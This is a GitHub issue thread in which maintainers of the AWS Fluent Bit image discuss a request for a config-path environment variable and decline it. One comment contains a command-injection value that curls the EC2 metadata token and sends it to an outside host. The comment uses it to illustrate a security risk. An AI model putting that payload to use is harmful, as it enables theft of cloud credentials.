### ISSUE TITLE
Create an env variable for custom fluent-bit.conf path

### ISSUE THREAD

**Issue by thpham** [aws/aws-for-fluent-bit#270]
Hello,

could it be possible to create an environment variable in the [`entrypoint.sh`](https://github.com/aws/aws-for-fluent-bit/blob/mainline/entrypoint.sh#L3) that is used as the main CMD of the Dockerfile, so that we could define alternative path for the `fluent-bit.conf` ?

Thank you

**Comment by PettitWesley** [comment]
@thpham Can you explain your use case in more detail? There may be simpler ways to achieve what you desire without changing our image. 

For example, you can use the @INCLUDE command in the main config file to import another config file: https://docs.fluentbit.io/manual/administration/configuring-fluent-bit/configuration-file

If you are using FireLens, its easy to add a new config file: https://github.com/aws-samples/amazon-ecs-firelens-examples/tree/mainline/examples/fluent-bit/config-file-type-file

**Comment by thpham** [comment]
@PettitWesley , sure. In fact, this request is not directly link with your image, but this change would help me to use your image as a sidecar container in the [bank-vault operator](https://banzaicloud.com/docs/bank-vaults/overview/) to tail the logs to Cloudwatch or S3.  One problem is that they first supported `fluentd` config filename convention and they hardcoded this filename in their operator (which is far from ideal). But the operator allows to inject variables to the sidecar, so that it could be used to point to the correct configuration filename.

so that means my problem could be solve, either from your side or from them by avoiding to hardcode the filename. btw I did a [commit](https://github.com/thpham/bank-vaults/commit/506ffdcc9bba5fcafe5333fe31c06dfa3d8f5773) to express the idea.

Nevertheless, I think my request could be also beneficial for your image in other contexts and , correct me if I'm wrong, this change seems minimal to me.

What do you think ?

**Comment by PettitWesley** [comment]
I see. So your specific use case is very specific. 

> I think my request could be also beneficial for your image in other contexts and , correct me if I'm wrong, this change seems minimal to me.

Yea I do think it's possibly generally useful, and it doesn't hurt to have it. I'm okay with it. Let's see what the rest of my team thinks.

**Comment by matthewfala** [comment]
One potential problem I see is that the custom config file is not copied into docker, so I'm not sure how this environment variable would actually be useful, unless there is a bunch of config files already included in our image which the user can select from (I don't think this is the case).

Another potential problem I see is that this may open our image to unlimited extension. You may be able to make our image do some interesting other things with this variable. Such as if the variable is set to:
```
FLUENT_BIT_CONFIG_FILE='/fluent-bit/etc/fluent-bit.conf; TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl http://mysite.com/retrieve-token/token=$TOKEN
```
Which would send over the IMDS token to our website. Not really a problem, but also not what our image is made to do.
That's a lot of added functionality for a seemingly benign "FLUENT_BIT_CONFIG_FILE" env variable. This could open the door to some users not taking the sanitation of this variable seriously and ending up with security problems.

So pretty much any set of commands can now be passed into our docker container and run along side fluent bit. Of course this is all only configurable from the environment variables, so this probably isn't an extreme security flaw or anything. However, we may not want to open our image to that kind of extension. Also the "FLUENT_BIT_CONFIG_FILE" seemingly variable being able to run other scripts doesn't seem great.

A solution that can address both problems is for a docker copy command to be added that copies the config file into docker replacing the `/fluent-bit/etc/fluent-bit.conf`. This will resolve the copy problem, and also close our image to unwanted extension.

**Comment by hossain-rayhan** [comment]
Also wondering, can't the include command in Fluent Bit config (Wesley's suggestion) help here?

**Comment by zhonghui12** [comment]
Maybe I misunderstand anything here. Also curious how we use this env variable as we don't copy any config file to this path into docker?

**Comment by PettitWesley** [comment]
@hossain-rayhan The problem with the @INCLUDE directive is two things:
1. It still requires a "main" config file that has the include statement.
2. Its not optional. So we can't have an `@INCLUDE ${MYFILE}` in the main config file, since the lack of that file will lead to a failure


@matthewfala 

> A solution that can address both problems is for a docker copy command to be added that copies the config file into docker replacing the /fluent-bit/etc/fluent-bit.conf. This will resolve the copy problem, and also close our image to unwanted extension.

How would this work to solve @thpham use case? I think you're just saying to solve his use case he can build a custom image with a custom Dockerfile which overrides the entrypoint? Actually that is a good point. @thpham what do you think about that?

> Another potential problem I see is that this may open our image to unlimited extension. You may be able to make our image do some interesting other things with this variable. Such as if the variable is set to:

**Comment by PettitWesley** [comment]
@hossain-rayhan @zhonghui12 

The way it works is that the user provides the config file with a kubernetes config map, or some volume mount. And then they set the env var.

For most customers, they can make the volume mount or config map be for the standard path. But in this user's special use case, they are stuck with a different config file path which the config will be mounted to. And then this env var would allow fluent bit to use that config file path, without requiring the creation of a new image.

I understand the use case, but its very niche/special. I am thinking that building a custom image is what @thpham should do.

**Comment by zhonghui12** [comment]
Yeah I am also thinking if we should change the Dockerfile instead? (correct me if you are not meaning this way..)

**Comment by PettitWesley** [comment]
@zhonghui12 I am suggesting that we change nothing, and that instead the customer creates a custom dockerfile that overrides our entrypoint to specify a new config file path.

**Comment by thpham** [comment]
@PettitWesley ok, I understand your point. I would have tried to avoid doing a custom image and maintain it. but fine. I will see with the other project, it seems there is also an other possibility. thanks again you took time to consider and understand my use case. cheers.

**Comment by PettitWesley** [comment]
Closing this since we have a resolution path for @thpham
